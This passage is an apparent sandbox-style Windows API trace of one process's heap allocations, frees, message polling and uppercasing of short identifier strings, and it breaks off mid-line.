1 [0102.205] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78368 [0102.205] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bf8 [0102.205] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a30 [0102.205] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783e0 | out: hHeap=0x2af0000) returned 1 [0102.205] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0102.205] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0102.205] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0102.205] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a48 [0102.205] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a718f8 [0102.205] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a48 | out: hHeap=0x2af0000) returned 1 [0102.205] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78458 [0102.206] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c28 [0102.206] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9be0 [0102.206] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b98 [0102.206] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78408 [0102.206] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a48 [0102.206] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719d8 [0102.206] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a48 | out: hHeap=0x2af0000) returned 1 [0102.206] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783e0 [0102.206] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a60 [0102.206] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a48 [0102.206] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78458 | out: hHeap=0x2af0000) returned 1 [0102.207] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0102.207] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c28 | out: hHeap=0x2af0000) returned 1 [0102.207] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0102.207] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78138 [0102.207] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a718f8 [0102.207] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0102.207] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78138 | out: hHeap=0x2af0000) returned 1 [0102.207] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0102.207] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9c10 [0102.207] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0102.207] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0102.207] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a718f8 [0102.207] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0102.207] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c28 [0102.207] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9af0 [0102.207] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a08 [0102.207] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9940 [0102.207] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0102.207] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ae8 [0102.207] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78110 [0102.207] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0102.207] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78110 | out: hHeap=0x2af0000) returned 1 [0102.207] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0102.207] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0102.207] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9af0 | out: hHeap=0x2af0000) returned 1 [0102.207] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c28 | out: hHeap=0x2af0000) returned 1 [0102.207] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0102.207] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0102.207] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed40 [0102.207] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0102.207] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed40 | out: hHeap=0x2af0000) returned 1 [0102.208] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0102.208] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a718f8 [0102.208] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78048 [0102.208] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a58 [0102.208] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0102.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78048 | out: hHeap=0x2af0000) returned 1 [0102.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0102.208] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9af0 [0102.208] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a73f20 [0102.208] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0102.208] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0102.208] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0102.208] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c28 [0102.208] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9940 [0102.208] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a78 [0102.208] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d00 [0102.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0102.208] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b08 [0102.208] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78430 [0102.208] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0102.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78430 | out: hHeap=0x2af0000) returned 1 [0102.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0102.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d00 | out: hHeap=0x2af0000) returned 1 [0102.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0102.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c28 | out: hHeap=0x2af0000) returned 1 [0102.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0102.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0102.208] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e840 [0102.208] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0102.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0102.208] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0102.208] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0102.209] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b88 [0102.209] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c28 [0102.209] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9940 [0102.209] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0102.209] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ee0 [0102.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0102.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ee0 | out: hHeap=0x2af0000) returned 1 [0102.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0102.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c28 | out: hHeap=0x2af0000) returned 1 [0102.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0102.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0102.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73f20 | out: hHeap=0x2af0000) returned 1 [0102.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9af0 | out: hHeap=0x2af0000) returned 1 [0102.209] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0102.209] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6fe0 [0102.209] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9af0 [0102.209] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c28 [0102.209] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0102.209] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9940 [0102.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0102.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0102.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c28 | out: hHeap=0x2af0000) returned 1 [0102.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9af0 | out: hHeap=0x2af0000) returned 1 [0102.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fe0 | out: hHeap=0x2af0000) returned 1 [0102.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0102.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0102.209] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e840 [0102.209] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0102.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0102.210] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0102.210] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78048 [0102.210] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a718f8 [0102.210] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0102.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78048 | out: hHeap=0x2af0000) returned 1 [0102.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0102.210] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9c28 [0102.210] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a74280 [0102.210] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0102.210] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a718f8 [0102.210] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0102.210] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9af0 [0102.210] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9940 [0102.210] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0102.210] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c58 [0102.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0102.210] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719f8 [0102.210] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fa8 [0102.210] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0102.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77fa8 | out: hHeap=0x2af0000) returned 1 [0102.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0102.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c58 | out: hHeap=0x2af0000) returned 1 [0102.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0102.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9af0 | out: hHeap=0x2af0000) returned 1 [0102.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0102.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0102.210] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e840 [0102.210] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0102.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0102.210] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0102.210] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a718f8 [0102.211] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9af0 [0102.211] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9940 [0102.211] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b88 [0102.211] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9df0 [0102.211] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0102.211] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9df0 | out: hHeap=0x2af0000) returned 1 [0102.211] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0102.211] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9af0 | out: hHeap=0x2af0000) returned 1 [0102.211] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0102.211] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a718f8 [0102.211] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9940 [0102.211] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9af0 [0102.211] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0102.211] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9df0 [0102.211] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0102.211] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9df0 | out: hHeap=0x2af0000) returned 1 [0102.211] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9af0 | out: hHeap=0x2af0000) returned 1 [0102.211] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0102.211] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0102.211] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0102.211] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74280 | out: hHeap=0x2af0000) returned 1 [0102.211] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c28 | out: hHeap=0x2af0000) returned 1 [0102.211] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0102.211] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a718f8 [0102.211] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0102.211] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0102.211] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c10 | out: hHeap=0x2af0000) returned 1 [0102.211] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0102.211] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5edc0 [0102.211] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0102.211] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a718f8 [0102.212] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a18 [0102.212] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f70a0 [0102.212] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70a0 | out: hHeap=0x2af0000) returned 1 [0102.212] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0102.212] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0102.212] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e6c0 [0102.212] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0102.212] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e6c0 | out: hHeap=0x2af0000) returned 1 [0102.212] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0102.212] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a718f8 [0102.212] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9af0 [0102.212] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c10 [0102.212] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b88 [0102.212] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781b0 [0102.212] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ab8 [0102.212] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0102.212] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a781b0 | out: hHeap=0x2af0000) returned 1 [0102.212] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0102.212] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9c28 [0102.212] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0102.212] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0102.212] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0102.212] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0102.212] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0102.212] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78430 | out: hHeap=0x2af0000) returned 1 [0102.212] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0102.212] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ca0 | out: hHeap=0x2af0000) returned 1 [0102.213] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ef8 | out: hHeap=0x2af0000) returned 1 [0102.213] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0102.213] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0102.213] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0102.213] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0102.213] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e6c0 | out: hHeap=0x2af0000) returned 1 [0102.213] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0102.213] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0102.213] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f10 | out: hHeap=0x2af0000) returned 1 [0102.213] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d18 | out: hHeap=0x2af0000) returned 1 [0102.213] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0102.213] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0102.213] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0102.213] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0102.213] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c28 | out: hHeap=0x2af0000) returned 1 [0102.213] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0102.213] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0102.213] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0102.213] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0102.213] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9af0 | out: 